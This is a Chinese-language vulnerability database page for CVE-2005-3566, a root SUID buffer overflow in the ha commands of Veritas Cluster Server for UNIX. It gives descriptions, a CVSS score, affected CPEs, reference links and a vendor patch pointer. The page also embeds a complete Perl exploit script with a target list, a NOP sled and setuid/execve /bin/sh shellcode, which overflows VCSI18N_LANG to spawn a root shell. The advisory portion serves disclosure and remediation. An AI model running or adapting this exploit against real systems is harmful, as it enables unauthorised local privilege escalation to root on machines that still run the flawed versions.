CVE-2005-3566
CVSS4.3
发布时间 :2005-11-16 02:42:00
修订时间 :2016-10-17 23:36:13
NMCOE    

[原文]Buffer overflow in various ha commands of VERITAS Cluster Server for UNIX before 4.0MP2 allows local users to execute arbitrary code via a long VCSI18N_LANG environment variable to (1) haagent, (2) haalert, (3) haattr, (4) hacli, (5) hacli_runcmd, (6) haclus, (7) haconf, (8) hadebug, (9) hagrp, (10) hahb, (11) halog, (12) hareg, (13) hares, (14) hastatus, (15) hasys, (16) hatype, (17) hauser, and (18) tststew.


[CNNVD]Veritas Cluster Server for UNIX ha命令本地缓冲区溢出漏洞(CNNVD-200511-213)

        Veritas集群服务器是一款存储控制解决方案,可有效的管理节点集群。
        Veritas Cluster Server中存在本地缓冲区溢出漏洞。在调用VCSI18N_LANG环境变量相关的多个ha命令时没有执行正确的边界检查,而受影响的代码是以系统管理员权限(Root SUID)运行的,因此恶意的攻击者可以破坏备份/存储功能,或在目标服务器上获得权限提升。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:symantec_veritas:cluster_server:2.2_linux
cpe:/a:symantec_veritas:storage_foundation:4.0_solaris
cpe:/a:symantec_veritas:cluster_server:4.0_linux
cpe:/a:symantec_veritas:cluster_server:4.0_aix_beta
cpe:/a:symantec_veritas:cluster_server:4.0_solaris_beta
cpe:/a:symantec_veritas:storage_foundation:3.4_aix
cpe:/a:symantec_veritas:cluster_server:3.5_mp1j
cpe:/a:symantec_veritas:cluster_server:3.5_solaris_beta
cpe:/a:symantec_veritas:cluster_server:4.0_linux_beta
cpe:/a:symantec_veritas:storage_foundation:1.0_aix
cpe:/a:symantec_veritas:storage_foundation:4.0_linux
cpe:/a:symantec_veritas:cluster_server:4.0_solaris
cpe:/a:symantec_veritas:cluster_server:3.5_hp-ux_update_2
cpe:/a:symantec_veritas:sanpoint_control_quickstart:3.5_solaris
cpe:/a:symantec_veritas:cluster_server:3.5_aix
cpe:/a:symantec_veritas:cluster_server:3.5_solaris_mp3
cpe:/a:symantec_veritas:cluster_server:3.5
cpe:/a:symantec_veritas:storage_foundation_cluster_file_system:4.0_aix
cpe:/a:symantec_veritas:cluster_server:2.2_linux_mp1p1
cpe:/a:symantec_veritas:cluster_server:3.5_solaris_mp2
cpe:/a:symantec_veritas:storage_foundation:4.0_aix
cpe:/a:symantec_veritas:storage_foundation:3.5_hp-ux
cpe:/a:symantec_veritas:storage_foundation:3.5_solaris
cpe:/a:symantec_veritas:storage_foundation_cluster_file_system:4.0_solaris
cpe:/a:symantec_veritas:cluster_server:2.2
cpe:/a:symantec_veritas:cluster_server:3.5_solaris_mp1
cpe:/a:symantec_veritas:cluster_server:4.0_solaris_mp1
cpe:/a:symantec_veritas:cluster_server:3.5_hp-ux
cpe:/a:symantec_veritas:cluster_server:3.5_solaris
cpe:/a:symantec_veritas:cluster_server:2.2_mp1
cpe:/a:symantec_veritas:cluster_server:4.0_aix
cpe:/a:symantec_veritas:storage_foundation_cluster_file_system:4.0_linux
cpe:/a:symantec_veritas:cluster_server:3.5_hp-ux_update_1
cpe:/a:symantec_veritas:storage_foundation:3.0_aix
cpe:/a:symantec_veritas:cluster_server:3.5_mp1
cpe:/a:symantec_veritas:storage_foundation:2.2_linux
cpe:/a:symantec_veritas:cluster_server:2.2_mp2
cpe:/a:symantec_veritas:cluster_server:3.5_mp2
cpe:/a:symantec_veritas:storage_foundation:2.2_vmware_esx
cpe:/a:symantec_veritas:cluster_server:3.5_p1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3566
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3566
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-213
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=113199516516880&w=2
(UNKNOWN)  BUGTRAQ  20051112 DMA[2005-1112a] - 'Veritas Storage Foundation VCSI18N_LANG buffer overflow'
http://securityreason.com/securityalert/174
(UNKNOWN)  SREASON  174
http://securityresponse.symantec.com/avcenter/security/Content/2005.11.08a.html
(VENDOR_ADVISORY)  CONFIRM  http://securityresponse.symantec.com/avcenter/security/Content/2005.11.08a.html
http://securitytracker.com/id?1015169
(PATCH)  SECTRACK  1015169
http://www.securityfocus.com/bid/15349
(UNKNOWN)  BID  15349
http://www.vupen.com/english/advisories/2005/2350
(UNKNOWN)  VUPEN  ADV-2005-2350
http://xforce.iss.net/xforce/xfdb/22986
(UNKNOWN)  XF  veritas-ha-bo(22986)

- 漏洞信息

Veritas Cluster Server for UNIX ha命令本地缓冲区溢出漏洞
中危 缓冲区溢出
2005-11-16 00:00:00 2006-03-27 00:00:00
本地  
        Veritas集群服务器是一款存储控制解决方案,可有效的管理节点集群。
        Veritas Cluster Server中存在本地缓冲区溢出漏洞。在调用VCSI18N_LANG环境变量相关的多个ha命令时没有执行正确的边界检查,而受影响的代码是以系统管理员权限(Root SUID)运行的,因此恶意的攻击者可以破坏备份/存储功能,或在目标服务器上获得权限提升。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://support.veritas.com/docs/279870

- 漏洞信息 (1316)

Veritas Storage Foundation 4.0 VCSI18N_LANG Local Overflow Exploit (EDBID:1316)
linux local
2005-11-12 Verified
0 Kevin Finisterre
N/A [点击下载]
#!/usr/bin/perl -w
#
# Veritas Storage Foundation 4.0 
#
# http://www.digitalmunition.com
# kf (kf_lists[at]digitalmunition[dot]com) - 08/19/2005
#
# This bug has not been patched as of:
# Q14438H.sf.4.0.00.0.rhel3_i686.tar.gz
#
# Make sure you don't get your sploits from some
# Frenchie at FR-SIRT go to milw0rm instead.
#
$retval = 0xbffffc17;

$tgts{"0"} = "/opt/VRTSvcs/bin/haagent:72";
$tgts{"1"} = "/opt/VRTSvcs/bin/haalert:72";
$tgts{"2"} = "/opt/VRTSvcs/bin/haattr:72";
$tgts{"3"} = "/opt/VRTSvcs/bin/hacli:72";
$tgts{"4"} = "/opt/VRTSvcs/bin/hareg:72";
$tgts{"5"} = "/opt/VRTSvcs/bin/haclus:72";
$tgts{"6"} = "/opt/VRTSvcs/bin/haconf:72";
$tgts{"7"} = "/opt/VRTSvcs/bin/hadebug:72";
$tgts{"8"} = "/opt/VRTSvcs/bin/hagrp:72";
$tgts{"9"} = "/opt/VRTSvcs/bin/hahb:72";
$tgts{"10"} = "/opt/VRTSvcs/bin/halog:72";
$tgts{"11"} = "/opt/VRTSvcs/bin/hares:72";
$tgts{"12"} = "/opt/VRTSvcs/bin/hastatus:72";
$tgts{"13"} = "/opt/VRTSvcs/bin/hasys:72";
$tgts{"14"} = "/opt/VRTSvcs/bin/hatype:72";
$tgts{"15"} = "/opt/VRTSvcs/bin/hauser:72";
$tgts{"16"} = "/opt/VRTSvcs/bin/tststew:72";

unless (($target) = @ARGV) {

        print "\n        Veritas Storage Foundation VCSI18N_LANG overflow, kf \(kf_lists[at]digitalmunition[dot]com\) - 08/19/2005\n";
        print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n\n";

$sc = "\x90"x1024;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$buf = "A" x $b;
$buf .= "$ret" x 2;

$ENV{"VCSI18N_LANG"} = $buf;
$ENV{"DMR0x"} = $sc;

exec("$a DMR0x");

# milw0rm.com [2005-11-12]
		

- 漏洞信息

20673
VERITAS Cluster Server for UNIX Multiple ha Command VCSI18N_LANG Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public, Exploit Unknown

- 漏洞描述

A local overflow exists in Veritas Cluster Server for UNIX. The issue is triggered when the application fails to properly check bounds of user-supplied data when handling the VCSI18N_LANG environment variable, resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code to be executed, resulting in a loss of integrity.

- 时间线

2005-11-08 2005-08-19
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Symantec has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站